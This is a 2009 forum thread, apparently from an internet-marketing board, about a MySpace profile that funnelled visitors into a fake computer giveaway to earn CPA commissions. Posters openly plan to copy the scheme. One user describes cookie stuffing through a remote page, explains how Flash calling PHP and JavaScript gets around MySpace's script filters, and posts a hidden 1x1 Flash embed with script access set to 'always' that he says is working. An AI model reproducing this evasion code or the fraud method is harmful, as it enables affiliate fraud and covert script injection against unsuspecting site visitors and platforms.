1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Found this going through myspace

Discussion in 'Social Networking Sites' started by CyrusVirus, Oct 29, 2009.

  1. CyrusVirus

    CyrusVirus BANNED BANNED Premium Member

    Joined:
    Aug 20, 2009
    Messages:
    1,110
    Likes Received:
    686
    ok guys, so i got a friend request from a ... chick i guess, went to her profile and found something odd.

    here is the url, i am only putting this on here so you can study it and figure out how they did it. maybe you guys can figure it out,
    i think this is a cpa thing, can't be an ewhore thing because it doesnt lead to anything like that.
    so, to the mods, please delete this if it is inappropriate, or if you think that it is not right.

    HTML:
    http://www.myspace.com/506289604
    This is only for others to maybe study it and get a few ideas on how to do this.
    i tried ever code i can think of with myspace, and this just blew my mind.

    EDIt: this is not mine
     
  2. nowimhere

    nowimhere Regular Member

    Joined:
    Jul 7, 2009
    Messages:
    262
    Likes Received:
    2,031
    Occupation:
    This is my job
    Location:
    Canada
    Wow, thats the LAST thing I expected to see!

    I wonder how they are monetizing this?

    Interesting...
     
  3. ch8878

    ch8878 Elite Member

    Joined:
    Mar 21, 2009
    Messages:
    2,242
    Likes Received:
    428
    Gender:
    Male
    Occupation:
    Gamer
    Location:
    Youtube
    Home Page:
    That is cool
     
  4. ifwearner

    ifwearner Regular Member

    Joined:
    Jul 24, 2008
    Messages:
    253
    Likes Received:
    51
    Theres a macbook air email submit at the end.. probably a rotator for various computer offers. They pre-qualify the lead by telling them its a Dell giveaway.. so they want a computer, enter my email? ok.. lemme get it.. boom paid. The end. But yeah idk how 'modules' and uploading your own css works with myspace.. maybe the old comedian profile trick?

    Save the page as complete and look at the basebundle_utqnbzen.css file and what .autoresize is doing.. thats where the magic happens.

    Good luck
     
  5. CyrusVirus

    CyrusVirus BANNED BANNED Premium Member

    Joined:
    Aug 20, 2009
    Messages:
    1,110
    Likes Received:
    686
    hmm good idea, i think ill get working on something like this, because whoever did this, is gonna make some good money.
     
  6. tentyler

    tentyler Junior Member

    Joined:
    Jun 28, 2008
    Messages:
    122
    Likes Received:
    17
    aww the profile was taken down I think.. I know even crazier things are possible with myspace. There's things such as xss worms(they have fixed most of the ways to do these) look up samy myspace on google for more info on that.
    I will give you all a hint to doing basically whatever you want to on myspace tho. They allow flash. Flash can call websites outside of the one its on. You use the flash to call javascript, visual basic script, or php that calls other things. There is quite a bit of possibilities. Allowing any external code can be a security threat if you know how to use it.
     
  7. mpruben

    mpruben Registered Member

    Joined:
    Jan 10, 2008
    Messages:
    51
    Likes Received:
    19
    Whatever it was, MySpace didn't like it:

    This user has either cancelled their membership, or their account has been deleted.
     
  8. nowimhere

    nowimhere Regular Member

    Joined:
    Jul 7, 2009
    Messages:
    262
    Likes Received:
    2,031
    Occupation:
    This is my job
    Location:
    Canada
    This always happens... This time, it was fast!

    buah haha hahaha!
     
  9. LadyHye

    LadyHye Registered Member

    Joined:
    Sep 2, 2009
    Messages:
    51
    Likes Received:
    12
    Location:
    Mount Prospect, Illinois, USA
    Daw.. now I wanna know! It's killing me..
     
  10. tentyler

    tentyler Junior Member

    Joined:
    Jun 28, 2008
    Messages:
    122
    Likes Received:
    17
    I pretty much gave it away in my post if you are willing to learn it, but I will not share on here because many of the methods that can be used are illegal.
     
  11. mrxtc89117

    mrxtc89117 Junior Member

    Joined:
    Apr 23, 2008
    Messages:
    150
    Likes Received:
    15
    I believe myspace has fixed that as all objects now are turned off by default. "allowScriptAccess=never"
     
  12. Gommie

    Gommie Newbie

    Joined:
    Jun 6, 2009
    Messages:
    43
    Likes Received:
    5
    Oops,

    Invalid Friend ID.
    This user has either cancelled their membership, or their account has been deleted.



    Anyone got a screenshot of the profile? I would like to get an idea of what you guys are talking?
     
  13. MsMoneyMagnet

    MsMoneyMagnet Registered Member

    Joined:
    Dec 8, 2008
    Messages:
    73
    Likes Received:
    410
    Gender:
    Female
    Occupation:
    Jobliss =D
    Location:
    1537 Paper Street
    Maybe it's not such a good idea to implememnt this afterall since myspace took it down with the quickness. :(
     
  14. irie08

    irie08 Junior Member

    Joined:
    Aug 23, 2009
    Messages:
    138
    Likes Received:
    52
    Well, I wouldn't spend much time analyzing or lamenting this particular method if Myspace dropped the hammer on it so quickly. Probably a good idea but needs more CYA...
     
  15. tentyler

    tentyler Junior Member

    Joined:
    Jun 28, 2008
    Messages:
    122
    Likes Received:
    17
    My c00kie stuffing on myspace goes to a remote page. That allow script access thing can be gotten around pretty easily. It is also possible to do it with images. You have to be creative with your coding to get around their filters though, but it is possible. I'm not sure if I'm allowed to make a guide on how to do it on this forum, but maybe I'll make one and post it up in vip.

    Myspace has by default for flash apps that are embedded 'allowscriptaccess=false' embedded with it...so you cant execute JS directly on the page. You can get around this by using flash to call php which calls java though. I'm not saying its easy because you have to make the code a certain way to escape their filters, but it is possible. Also most of their limits apply to embed tags you can use flash objects fine. An example that is currently working for me is

    PHP:
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="1" height="1" id="movie" align="">
    <
    param name=FlashVars value="cid=11&id=0">
    <
    param name="movie" value="http://mywebsite.com/files/11.swf">
    <
    param name="bgcolor" value="#ffffff">
    <
    param name="allowScriptAccess" value="always" />
    <
    embed allowScriptAccess="always" FlashVars="cid=11&id=0" src="http://mywebsite.com/files/11.swf" quality="high" bgcolor="#ffffff" width="1" height="1" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>
    </
    object>
    I have had no problems from myspace running this, but it also doesn't make a huge ad on my page lol.
     
  16. CSalt2

    CSalt2 Jr. VIP Jr. VIP Premium Member

    Joined:
    Feb 5, 2009
    Messages:
    753
    Likes Received:
    357
    What exactly was on the profile?
     
  17. dizz

    dizz Elite Member

    Joined:
    May 19, 2009
    Messages:
    2,068
    Likes Received:
    1,774
    Occupation:
    This... AND MORE!! :D
    Location:
    Texas
    been deleted what was it?
     
  18. Adimof

    Adimof Junior Member

    Joined:
    Feb 13, 2009
    Messages:
    165
    Likes Received:
    11
    I want to know too...